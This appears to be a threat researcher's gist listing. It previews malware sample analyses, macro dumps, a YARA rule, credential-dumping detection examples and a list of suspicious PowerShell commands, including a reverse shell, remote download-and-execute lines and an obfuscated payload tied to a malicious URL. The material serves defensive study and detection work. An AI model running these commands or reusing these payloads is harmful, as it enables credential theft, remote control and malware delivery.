This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long | |
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long | |
Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long | |
Declare Function GetLogicalDrives& Lib "kernel32" () | |
Declare Function GetShortPathName Lib "Kernel32.dll" Alias _ | |
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _ | |
Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long | |
Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## uploaded by @JohnLaTwC | |
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
<html> | |
<head> | |
<script language="JScript"> | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
By @JohnLaTwC | |
References: | |
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense) | |
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ | |
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24) | |
Detection Examples: | |
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 | |
Type: OLE | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisWorkbook.cls | |
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
Public RUNNING As Boolean |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule gen_injected_template_Word | |
{ | |
meta: | |
description = "Detects injected templates in DOCX" | |
author = "John Lambert @JohnLaTwC" | |
date = "2020-05-03" | |
hash1 = "a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063" | |
hash2 = "a275dfa95393148bb9e0ddf5346f9fedcc9c87fa2ec3ce1ec875843664c37c89" | |
hash3 = "ed4835e5fd10bbd2be04c5ea9eb2b8e750aff2ef235de6e0f18d369469f69c83" | |
file_protocol_hash1 = "ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08 (settings.xml.rels)" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands | |
powershell -w 1 -exec bypass -e aQBlAH… --> "iex ((" | |
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "... | |
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('. | |
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")" | |
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID | |
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber | |
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber | |
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe" |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Sample hash: | |
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9 | |
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d | |
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685 | |
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c | |
## http://moveis-schuster-com.ga/Order.jpg returns: | |
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Uploaded by @JohnLaTwC | |
## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf | |
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf | |
Type: OLE | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
SHELL=/bin/sh | |
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin | |
#This is the Old-ReBuild Lady job copy | |
# | |
#Goal: | |
# The goal of this campaign is as follows; | |
# - To keep the internet safe. | |
# - To keep them hackers from causing real damage to organisations. | |
# - We know you feel We are a potential threat, well We ain't. |
NewerOlder